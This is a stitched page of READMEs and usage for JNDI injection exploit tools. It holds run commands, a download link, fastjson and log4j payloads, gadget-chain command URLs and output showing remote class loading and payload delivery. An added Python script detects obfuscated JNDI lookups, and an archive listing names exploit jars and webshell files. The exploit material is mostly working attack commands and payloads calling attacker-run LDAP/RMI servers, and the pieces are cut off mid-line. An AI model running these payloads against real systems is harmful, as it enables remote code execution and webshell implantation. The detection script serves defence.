# jndi_tool
```
Disclaimer: this tool is intended only for enterprise security personnel to self-check the security risks of their own enterprise assets, or for legally authorised security testing. Do not use it for any other purpose; if you do, you bear the consequences yourself.
download_url : https://toolaffix.oss-cn-beijing.aliyuncs.com/jndi_tool.jar
> java -jar jndi_tool.jar
Usage:
jndi_http:
java -cp jndi_tool.jar jndi.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn"
java -cp jndi_tool.jar jndi.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn"
rmi_high_jdk:
java -cp jndi_tool.jar jndi.EvilRMIServer 8888 1099 "curl dnslog.wyzxxz.cn" el-win/el-linux/groovy
ldap_normal:
java -cp jndi_tool.jar jndi.LDAPRefServer 1099 host=127.0.0.1
ldap_auto:
java -cp jndi_tool.jar jndi.LDAPRefServerAuto 127.0.0.1 1099 80 file=filename (param_format: __JNDI__)
fastjson:
java -cp jndi_tool.jar jndi.fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex chunk=on
java -cp jndi_tool.jar jndi.fastjson.BCELEncode "curl dnslog.wyzxxz.cn"
java -cp jndi_tool.jar jndi.fastjson.Tamper "{\"abc\":{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://127.0.0.1:1099/Object\",\"autoCommit\":true}}"
log4j:
java -cp jndi_tool.jar jndi.log4j.HLDAPLog4j 127.0.0.1 80 "whoami" http://target w=tomcat/groory/http default:http
java -cp jndi_tool.jar jndi.log4j.Tamper "${jndi:ldap://127.0.0.1/a}" all=true random=true
java -cp jndi_tool.jar jndi.log4j.Log4j 127.0.0.1 80 url=http://xx.xx or urls=1.txt thread=10    (log4j detection; payloads 0 or 4 are recommended as the more generic ones)
Example for the newly added jndi.LDAPRefServerAuto:
> cat request1.txt
GET /${jndi:__JNDI__} HTTP/1.1
Host: xx.xx.xx.xx
Accept: \${jndi:__JNDI__}
> java -cp jndi_tool.jar jndi.LDAPRefServerAuto xx.xx.xx.xx 1099 80 file=request1.txt
or
> java -cp jndi_tool.jar jndi.LDAPRefServerAuto xx.xx.xx.xx 1099 80 url="http://xx.xx.xx/\${jndi:__JNDI__}" headers="Accept: \${jndi:__JNDI__}"
[-] url: http://xx.xx.xx/${jndi:__JNDI__}
[-] process headers: {Accept=${jndi:__JNDI__}}
[-] use: ldap://xx.xx.xx:1099/JNDIObject
[-] url: http://xx.xx.xx/${jndi:ldap://xx.xx.xx:1099/JNDIObject}
[-] LDAP Listening on xx.xx.xx:1099
[-] get request delay time, waiting...
[-] use waiting time: 1000
[-] checking CommonsBeanutils2
[-] checking CommonsCollections8
[-] checking CommonsCollections10
[-] checking CommonsCollectionsK1
[-] checking CommonsCollectionsK2
[-] checking CommonsCollectionsK3
[-] checking CommonsCollectionsK4
[-] checking CommonsBeanutils1
[*] find: CommonsBeanutils1 can be use
[-] checking CommonsCollections1
[-] checking CommonsCollections2
[-] checking CommonsCollections3
[-] checking CommonsCollections5
[-] checking CommonsCollections6
[-] checking CommonsCollections7
[-] checking CommonsCollections9
[-] checking Groovy1
[-] checking JSON1
[*] find: JSON1 can be use
[-] checking Jdk7u21
[-] checking Spring1
[-] checking Spring2
[-] checking el
waiting ...
retrying ...
[*] find: el can be use
0. CommonsBeanutils1
1. JSON1
2. el
[-] please choose gadget, enter q or quit to quit,
> 0
* example: curl x.xx , bash=curl `whoami`.x.xx
[-] please enter command, enter q or quit to quit,
> curl x.dnslog
[-] please enter command, enter q or quit to quit,
> back
0. CommonsBeanutils1
1. JSON1
2. el
[-] please choose gadget, enter q or quit to quit,
> 2
* example: curl x.xx , bash=curl `whoami`.x.xx
[-] please enter command, enter q or quit to quit,
> curl x.dnslog
[-] please enter command, enter q or quit to quit,
> q
=============================================================================
[root@ /]# java -cp jndi_tool.jar jndi.HRMIServer xx.xx.xx.xx 80 "curl dnslog.wyzxxz.cn"
[-] Opening JRMP listener on 80
[-] Have connection from /xx.xx.xx.xx:33543
[-] Reading message...
[-] Is RMI.lookup call for Exploit 2
[-] Sending remote classloading stub targeting http://xx.xx.xx.xx:80/Object.class
[-] Closing connection
[*] Have connection from /xx.xx.xx.xx:33544 /Object.class
[-] remote target jdk version: java/1.7.0_79, use payload version: jdk7
[-] send payload done and exit.
[root@ /]# java -cp jndi_tool.jar jndi.HLDAPServer xx.xx.xx.xx 80 "curl dnslog.wyzxxz.cn"
[-] LDAP Listening on 0.0.0.0:80
[*] Send LDAP reference result for Exploit redirecting to http://xx.xx.xx.xx:80/Object.class
[*] Have connection from /xx.xx.xx.xx:33548 /Object.class
[-] remote target jdk version: java/1.7.0_79, use payload version: jdk7
[-] remote target jdk version: java/1.7.0_79, use payload version: jdk7
[-] send payload done and exit.
=============================================================================
rmi:
1. Start the RMI server; the command to execute follows.
java -cp jndi_tool.jar jndi.EvilRMIServer 1099 8888 "curl dnslog.wyzxxz.cn"
2. Send the request:
POST /test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:1099/Object","autoCommit":true}
3. Check the log to see whether the curl succeeded.
=============================================================================
ldap:
1. Start the LDAP server; the command to execute follows.
java -cp jndi_tool.jar jndi.HLDAPServer xx.xx.xx.xx 80 "curl dnslog.wyzxxz.cn"
2. Send the request:
POST /test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xx.xx.xx.xx:80/Object","autoCommit":true}
3. Check the log to see whether execution succeeded.
=============================================================================
ldap:
1. Start the LDAP server; the command to execute follows.
> java -cp jndi_tool.jar jndi.LDAPRefServer 1099 host="0.0.0.0"
[-] Payloads: CommonsBeanutils1-2,CommonsCollections1-10,CommonsCollectionsK1-4,Groovy1,Clojure,JSON1,Spring1-2,URLDNS,file,tomcat,groovy
[-] etc: ldap://0.0.0.0:1099/CommonsBeanutils1/curl x.cn
[-] etc: ldap://0.0.0.0:1099/CommonsCollections1/bash=ping x.cn
[-] etc: ldap://0.0.0.0:1099/URLDNS/x.cn
[-] etc: ldap://0.0.0.0:1099/file/base64data_filename
[-] etc: ldap://0.0.0.0:1099/el/whomai
[-] etc: ldap://0.0.0.0:1099/groovy/whomai
[-] etc: ldap://0.0.0.0:1099/mlet/http://xx.xx
[-] etc: ldap://0.0.0.0:1099/groovyload/http://xx.xx
[-] etc: ldap://0.0.0.0:1099/snakeyaml/http://xx.xx/x.jar
[-] etc: ldap://0.0.0.0:1099/xstream/curl x.dns
[-] etc: ldap://0.0.0.0:1099/mvel/whoami
[-] etc: ldap://0.0.0.0:1099/loadlib//tmp/nativeLib_name
[-] etc: ldap://0.0.0.0:1099/tomcatxxe/http://xx.xx/xxe.xml
jdbc:
[-] etc: ldap://0.0.0.0:1099/tomcatdbcp/whoami
[-] etc: ldap://0.0.0.0:1099/tomcatdbcp2/whoami
[-] etc: ldap://0.0.0.0:1099/commondbcp/whoami
[-] etc: ldap://0.0.0.0:1099/commondbcp2/whoami
[-] etc: ldap://0.0.0.0:1099/tomcatjdbc/whoami
[-] etc: ldap://0.0.0.0:1099/druidjdbc/whoami
2. Send the request:
POST /test HTTP/1.1
Host: 127.0.0.1
Content-Type: application/json
Accept-Encoding: gzip, deflate
Connection: close
Accept: */*
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X)
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xx.xx.xx.xx:1099/CommonsCollections1/curl x.com","autoCommit":true}
3. Check the log to see whether execution succeeded.
=============================================================================
fastjson:
> java -cp jndi_tool.jar jndi.fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename
filename is the request file; put __PAYLOAD__ where the fastjson payload should be inserted. Example:
POST /fastjson_demo HTTP/1.1
Host: xx.xx.xx.xx
Connection: keep-alive
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.16 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type
```
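The `${jndi:...}` lookups, the obfuscated log4j variants produced by `jndi.log4j.Tamper ... all=true random=true`, and the fastjson `JdbcRowSetImpl` request bodies shown above are the indicators a defender has to find in access logs and request bodies. The following Python is an added example written for this page, not code from jndi_tool or JNDI-Inject-Exploit. It URL-decodes each log line and collapses nested `${lower:..}`, `${upper:..}` and `${x:-y}` lookups from the inside out before matching, so a rule that only matches the literal string `${jndi:` is not fooled by the obfuscated forms, and it walks JSON bodies for `@type` gadget classes and JNDI-scheme string values. The sample log lines and JSON body are constructed, and the suspect-type set contains only the class named on this page; it is a starting point, not a complete deny list.

```python
"""Defender-side indicators for JNDI injection in access logs and JSON bodies.

Added example for this page; not part of jndi_tool or JNDI-Inject-Exploit.
"""
import json
import re
from urllib.parse import unquote

# Innermost ${...} lookup: no nested '$', '{' or '}' inside the braces.
_INNER = re.compile(r"\$\{([^${}]*)\}")
# What we match once obfuscation has been collapsed.
_JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)
# Value schemes that make a JSON string a JNDI reference.
_JNDI_SCHEME = re.compile(r"^(ldaps?|rmi|iiop)://", re.IGNORECASE)
# Gadget classes to flag in '@type'. Only the class named on this page is
# listed; a real deployment extends this from its own deny list.
_SUSPECT_TYPES = {"com.sun.rowset.JdbcRowSetImpl"}


def _resolve(body: str):
    """Evaluate one lookup body when it is a pure obfuscation helper.

    ${lower:X} / ${upper:X}  -> X in the requested case
    ${env:UNSET:-X}, ${::-X} -> the default value X
    Anything else (including the jndi lookup itself) is left untouched.
    """
    m = re.fullmatch(r"(lower|upper):(.*)", body, re.DOTALL)
    if m:
        return m.group(2).lower() if m.group(1) == "lower" else m.group(2).upper()
    if ":-" in body:
        return body.split(":-", 1)[1]
    return None


def normalize(text: str, max_rounds: int = 10) -> str:
    """URL-decode (twice, for double encoding) and collapse nested lookups
    from the inside out until a round changes nothing."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        changed = False

        def _sub(m):
            nonlocal changed
            replacement = _resolve(m.group(1))
            if replacement is None:
                return m.group(0)
            changed = True
            return replacement

        text = _INNER.sub(_sub, text)
        if not changed:
            break
    return text


def scan_log_line(line: str) -> bool:
    """True if the line carries a JNDI lookup, obfuscated or not."""
    return bool(_JNDI_LOOKUP.search(normalize(line)))


def scan_json_body(body: str) -> list:
    """Walk a JSON document; report '@type' gadgets and JNDI-scheme strings."""
    findings = []
    try:
        doc = json.loads(body)
    except ValueError:
        return findings

    def walk(node, path):
        if isinstance(node, dict):
            declared = node.get("@type")
            if isinstance(declared, str) and declared in _SUSPECT_TYPES:
                findings.append(f"{path}: autoType {declared}")
            for key, value in node.items():
                if isinstance(value, str) and _JNDI_SCHEME.match(value):
                    findings.append(f"{path}.{key}: JNDI URL {value}")
                walk(value, f"{path}.{key}")
        elif isinstance(node, list):
            for i, value in enumerate(node):
                walk(value, f"{path}[{i}]")

    walk(doc, "$")
    return findings


# Constructed sample input (not captured from any real system).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET /index HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - "GET /${jndi:ldap://198.51.100.7:1099/a} HTTP/1.1" 404 "-"',
    '10.0.0.9 - - "GET /x HTTP/1.1" 200 "${${lower:j}${upper:n}di:${::-l}dap://198.51.100.7/b}"',
    '10.0.0.9 - - "GET /%24%7B%24%7Benv%3ANOPE%3A-j%7Dndi%3Aldap%3A%2F%2F198.51.100.7%2Fc%7D HTTP/1.1" 200 "-"',
]
SAMPLE_JSON_BODY = (
    '{"@type":"com.sun.rowset.JdbcRowSetImpl",'
    '"dataSourceName":"ldap://198.51.100.7:1099/Object","autoCommit":true}'
)

if __name__ == "__main__":
    for line in SAMPLE_LOG_LINES:
        print("ALERT" if scan_log_line(line) else "ok   ", line[:60])
    for finding in scan_json_body(SAMPLE_JSON_BODY):
        print("ALERT", finding)
```

The normalization step is the part that matters: the second and third constructed lines both reduce to a plain `${jndi:ldap://...}` before the match runs, which is why a single case-insensitive pattern suffices afterwards. For JSON, flagging any `@type` against a deny list and any `ldap://`/`rmi://` value independently means a body is still caught when the attacker swaps the gadget class for one not yet on the list.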
# JNDI-Inject-Exploit

## Disclaimer

This tool is intended only for **legally authorised enterprise security testing**. If you need to test the tool's functionality, set up your own target environment. When using this tool for testing you must ensure the activity complies with local laws and regulations and that sufficient authorisation has been obtained. **Do not scan unauthorised targets; if you engage in any illegal activity while using this tool, you bear the consequences yourself, and the author accepts no legal or joint liability.**

## Introduce

> This tool addresses scenarios such as Fastjson, log4j2 and native JNDI injection in which remote malicious classes cannot be loaded on higher JDK versions: the LDAP server returns native Java deserialization data, and if the victim (client) has the deserialization gadget dependencies available, this can achieve command execution, code execution, command execution with echo, and fileless in-memory webshell registration.
>
> Solve the high version of JDK Bypass, like FastJson, Jackson, Log4j2, native JNDI injection vulnerabilities, and detect locally available deserialization gad
## Archive contents: JNDIExploit.7z (19 files)

- jndi_wyzxxz_tool/
  - jndi_wyzxxz_tool.jar 27.59MB
  - README.md 17KB
- JNDI-Inject-Exploit/
  - README.md 6KB
  - config.properties 405B
  - JNDI-Inject-Exploit-0.3-all.jar 80.53MB
- JNDIExploit.feihong.v1.2/
  - lib/
    - commons-beanutils-1.9.2.jar 228KB
    - commons-beanutils-1.8.2.jar 226KB
  - JNDIExploit-feihong-1.2-SNAPSHOT.jar 37.27MB
  - README.md 10KB
- JNDIExploit.White.v1.3/
  - data/
    - Calc.class 525B
    - behinder3.jar 6KB
    - BehinderFilter.class 8KB
  - JNDIExploit-White-1.3-SNAPSHOT.jar 35.59MB
  - README.md 12KB
- JNDIExploit.0x727.v1.3/
  - data/
    - Calc.class 525B
    - behinder3.jar 6KB
    - BehinderFilter.class 8KB
  - JNDIExploit-0x727-1.3-SNAPSHOT.jar 30.94MB
  - README.md 12KB